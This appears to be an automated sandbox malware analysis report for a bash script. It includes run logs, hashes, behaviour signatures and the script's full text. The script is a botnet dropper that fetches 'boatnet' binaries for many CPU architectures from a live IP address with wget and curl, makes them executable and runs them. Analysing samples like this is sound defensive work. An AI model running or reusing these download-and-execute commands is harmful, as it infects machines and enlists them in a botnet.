size: 100000000 2025-12-08 05:51:53,848 [root] INFO: Added new process to list with pid: 2268 2025-12-08 05:51:53,863 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2600, Max size: 100000000 2025-12-08 05:51:53,868 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2600, Max size: 100000000 2025-12-08 05:51:53,957 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2668, Max size: 100000000 2025-12-08 05:51:53,961 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2702, Max size: 100000000 2025-12-08 05:51:53,964 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2734, Max size: 100000000 2025-12-08 05:51:54,074 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2748, Max size: 100000000 2025-12-08 05:51:54,076 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2755, Max size: 100000000 2025-12-08 05:51:54,078 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2760, Max size: 100000000 2025-12-08 05:51:54,080 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2771, Max size: 100000000 2025-12-08 05:51:54,083 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2771, Max size: 100000000 2025-12-08 05:51:54,100 [root] INFO: New child process detected: 2274 2025-12-08 05:51:54,105 [root] ERROR: Could not read memory range 7f8817e76000-7f8817e84000: [Errno 5] Input/output error 2025-12-08 05:51:54,107 [root] ERROR: Could not read memory range 7ffe83c91000-7ffe83c95000: [Errno 5] Input/output error 2025-12-08 05:51:54,107 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2274.dmp size is 2301952, Max size: 100000000 2025-12-08 05:51:54,116 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2787, Max size: 100000000 2025-12-08 05:51:54,117 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2815, Max size: 100000000 2025-12-08 05:51:54,143 [root] INFO: Added new process to list with pid: 2274 2025-12-08 05:51:54,246 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2884, Max size: 100000000 2025-12-08 05:51:54,257 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2918, Max size: 100000000 2025-12-08 05:51:54,266 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2950, Max size: 100000000 2025-12-08 05:51:54,397 [root] INFO: New child process detected: 2279 2025-12-08 05:51:54,411 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2975, Max size: 100000000 2025-12-08 05:51:54,423 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2987, Max size: 100000000 2025-12-08 05:51:54,452 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3004, Max size: 100000000 2025-12-08 05:51:54,459 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2279.dmp size is 15196160, Max size: 100000000 2025-12-08 05:51:54,470 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3032, Max size: 100000000 2025-12-08 05:51:54,592 [root] INFO: Process with pid 2274 has terminated 2025-12-08 05:51:54,593 [root] INFO: Process with pid 2268 has terminated 2025-12-08 05:51:54,598 [root] INFO: Added new process to list with pid: 2279 2025-12-08 05:51:54,706 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3100, Max size: 100000000 2025-12-08 05:51:54,715 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3134, Max size: 100000000 2025-12-08 05:51:54,723 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3166, Max size: 100000000 2025-12-08 05:51:54,854 [root] INFO: New child process detected: 2285 2025-12-08 05:51:54,897 [root] ERROR: Could not read memory range 7ffddbde0000-7ffddbde4000: [Errno 5] Input/output error 2025-12-08 05:51:54,900 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2285.dmp size is 7397376, Max size: 100000000 2025-12-08 05:51:54,958 [root] INFO: Added new process to list with pid: 2285 2025-12-08 05:51:55,017 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3168, Max size: 100000000 2025-12-08 05:51:55,020 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3175, Max size: 100000000 2025-12-08 05:51:55,022 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3179, Max size: 100000000 2025-12-08 05:51:55,024 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3182, Max size: 100000000 2025-12-08 05:51:55,027 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3187, Max size: 100000000 2025-12-08 05:51:55,034 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3194, Max size: 100000000 2025-12-08 05:51:55,043 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3200, Max size: 100000000 2025-12-08 05:51:55,045 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3202, Max size: 100000000 2025-12-08 05:51:55,052 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3203, Max size: 100000000 2025-12-08 05:51:55,089 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3247, Max size: 100000000 2025-12-08 05:51:55,597 [root] INFO: Process with pid 2176 has terminated 2025-12-08 05:51:55,597 [root] INFO: Process with pid 2279 has terminated 2025-12-08 05:51:55,597 [root] INFO: Process with pid 2285 has terminated 2025-12-08 05:51:55,598 [root] INFO: Process with pid 2169 has terminated 2025-12-08 05:51:55,598 [root] INFO: Process with pid 2171 has terminated 2025-12-08 05:51:55,598 [root] INFO: Process with pid 2172 has terminated 2025-12-08 05:51:55,598 [root] INFO: Process with pid 2175 has terminated 2025-12-08 05:51:55,598 [root] INFO: Process list is empty, terminating analysis 2025-12-08 05:51:56,599 [root] INFO: Stopping auxiliary modules 2025-12-08 05:51:56,600 [root] INFO: Stopping auxiliary module: Auditd 2025-12-08 05:51:56,600 [root] INFO: Stopping auxiliary module: FileCollector 2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Human 2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Screenshots 2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Sysmon 2025-12-08 05:52:03,603 [modules.auxiliary.filecollector] INFO: FileCollector run completed 2025-12-08 05:52:03,615 [lib.common.results] INFO: File /tmp/sysmon.data size is 17, Max size: 100000000 2025-12-08 05:52:03,616 [root] INFO: Stopping auxiliary module: Docker 2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop 2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop + was enabled 2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module skips log collection as it uses streaming 2025-12-08 05:52:05,771 [modules.auxiliary.tracee] DEBUG: Docker container stopped: tracee 2025-12-08 05:52:05,771 [root] INFO: Finishing auxiliary modules 2025-12-08 05:52:05,772 [lib.common.results] WARNING: File /sslkeylog.log doesn't exist anymore 2025-12-08 05:52:05,772 [root] INFO: Analysis completed
Machine
| Name | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| ubuntu22.04-64bit-1 | ubuntu22.04-64bit-1 | KVM | 2025-12-08 13:51:40 | 2025-12-08 13:52:13 |
File Details
| File Name |
1cf0094b3df50bafb3e48.sh
|
|---|---|
| File Type | Bourne-Again shell script, ASCII text executable |
| File Size | 2940 bytes |
| MD5 | 9114f27bcd7a096cb8a6259cf4687c41 |
| SHA1 | 009f9067ea63717d59454e547b25bb3f0fa39de5 |
| SHA256 | 1cf0094b3df50bafb3e480883add7aa16147bb5f32e684173e3fd65d406b10d0 [VT] [MWDB] [Bazaar] |
| SHA3-384 | 024044074da4f82d20e69d192d702dea1e37d924b1893326b4f6e4b6a91e34bfe251eb1eb7bea6aa99fa88a952c9d728 |
| CRC32 | 51423343 |
| TLSH | T1A451E7C6C6860E302C63AA57E7B64DAC3483A1AF19E9EB95DDC8BBE0034ED147160753 |
| Ssdeep | 48:vL7m7N7hLd6GLgVzPLNKWLXoUL7X7o7ULfc3bL29RLjcgLqpVLVSOL5+CLsfTLEK:vL7m7N7hLd6GLgVzPLNKWLXoUL7X7o76 |
| File BinGraph Vba2Graph Text |
#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.x86; curl -O http://79.133.46.243/hiddenbin/boatnet.x86;cat boatnet.x86 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.mips; curl -O http://79.133.46.243/hiddenbin/boatnet.mips;cat boatnet.mips >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arc; curl -O http://79.133.46.243/hiddenbin/boatnet.arc;cat boatnet.arc >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.i468; curl -O http://79.133.46.243/hiddenbin/boatnet.i468;cat boatnet.i468 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.i686; curl -O http://79.133.46.243/hiddenbin/boatnet.i686;cat boatnet.i686 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.x86_64; curl -O http://79.133.46.243/hiddenbin/boatnet.x86_64;cat boatnet.x86_64 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.mpsl; curl -O http://79.133.46.243/hiddenbin/boatnet.mpsl;cat boatnet.mpsl >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm; curl -O http://79.133.46.243/hiddenbin/boatnet.arm;cat boatnet.arm >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm5; curl -O http://79.133.46.243/hiddenbin/boatnet.arm5;cat boatnet.arm5 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm6; curl -O http://79.133.46.243/hiddenbin/boatnet.arm6;cat boatnet.arm6 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm7; curl -O http://79.133.46.243/hiddenbin/boatnet.arm7;cat boatnet.arm7 >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.ppc; curl -O http://79.133.46.243/hiddenbin/boatnet.ppc;cat boatnet.ppc >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.spc; curl -O http://79.133.46.243/hiddenbin/boatnet.spc;cat boatnet.spc >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.m68k; curl -O http://79.133.46.243/hiddenbin/boatnet.m68k;cat boatnet.m68k >WTF;chmod +x *;./WTF cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.sh4; curl -O http://79.133.46.243/hiddenbin/boatnet.sh4;cat boatnet.sh4 >WTF;chmod +x *;./WTF
Usage
Processing ( 25.41 seconds )
- 23.768 CAPE
- 0.623 Heatmap
- 0.548 StraceAnalysis
- 0.453 TraceeAnalysis
- 0.012 AnalysisInfo
- 0.002 NetworkAnalysis
- 0.001 Debug
Signatures ( 0.00 seconds )
Reporting ( 2.83 seconds )
- 2.758 MITRE_TTPS
- 0.05 ReportHTML
- 0.013 LiteReport
- 0.013 JsonDump
Signatures
Reads files from disk
ReadFile: /lib/x86_64-linux-gnu/libc.so.6
ReadFile: /lib/x86_64-linux-gnu/libtinfo.so.6
ReadFile: /tmp/1cf0094b3df50bafb3e48.sh
ReadFile: /lib/x86_64-linux-gnu/libpcre2-8.so.0
ReadFile: /lib/x86_64-linux-gnu/libuuid.so.1
ReadFile: /lib/x86_64-linux-gnu/libidn2.so.0
ReadFile: /lib/x86_64-linux-gnu/libssl.so.3
ReadFile: /lib/x86_64-linux-gnu/libcrypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libz.so.1
ReadFile: /lib/x86_64-linux-gnu/libpsl.so.5
ReadFile: /lib/x86_64-linux-gnu/libunistring.so.2
ReadFile: /etc/wgetrc
ReadFile: /etc/localtime
ReadFile: /usr/share/locale/locale.alias
ReadFile: /lib/x86_64-linux-gnu/libcurl.so.4
ReadFile: /lib/x86_64-linux-gnu/libnghttp2.so.14
ReadFile: /lib/x86_64-linux-gnu/librtmp.so.1
ReadFile: /lib/x86_64-linux-gnu/libssh.so.4
ReadFile: /lib/x86_64-linux-gnu/libgssapi_krb5.so.2
ReadFile: /lib/x86_64-linux-gnu/libldap-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/liblber-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/libzstd.so.1
ReadFile: /lib/x86_64-linux-gnu/libbrotlidec.so.1
ReadFile: /lib/x86_64-linux-gnu/libgnutls.so.30
ReadFile: /lib/x86_64-linux-gnu/libhogweed.so.6
ReadFile: /lib/x86_64-linux-gnu/libnettle.so.8
ReadFile: /lib/x86_64-linux-gnu/libgmp.so.10
ReadFile: /lib/x86_64-linux-gnu/libkrb5.so.3
ReadFile: /lib/x86_64-linux-gnu/libk5crypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libcom_err.so.2
ReadFile: /lib/x86_64-linux-gnu/libkrb5support.so.0
ReadFile: /lib/x86_64-linux-gnu/libsasl2.so.2
ReadFile: /lib/x86_64-linux-gnu/libbrotlicommon.so.1
ReadFile: /lib/x86_64-linux-gnu/libp11-kit.so.0
ReadFile: /lib/x86_64-linux-gnu/libtasn1.so.6
ReadFile: /lib/x86_64-linux-gnu/libkeyutils.so.1
ReadFile: /lib/x86_64-linux-gnu/libresolv.so.2
ReadFile: /lib/x86_64-linux-gnu/libffi.so.8
ReadFile: /usr/lib/ssl/openssl.cnf
ReadFile: /etc/nsswitch.conf
ReadFile: /etc/passwd
ReadFile: ./WTF
Drops files onto disk
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
DroppedFile: WTF
Writes to files on disk
WriteFile: STDERR
Deletes files from disk
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
DeletedFile: "WTF"
Screenshots
No screenshots available.Session Playback
No playback available.
Hosts
No hosts contacted.
DNS
No domains contacted.
Summary
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.
No hosts contacted.
No TCP connections recorded.
No UDP connections recorded.
No domains contacted.
HTTP Requests
No HTTP(s) requests performed.
SMTP traffic
No SMTP traffic performed.
IRC traffic
No IRC requests performed.
No ICMP traffic performed.
CIF Results
No CIF Results
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Suricata HTTP
No Suricata HTTP
Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.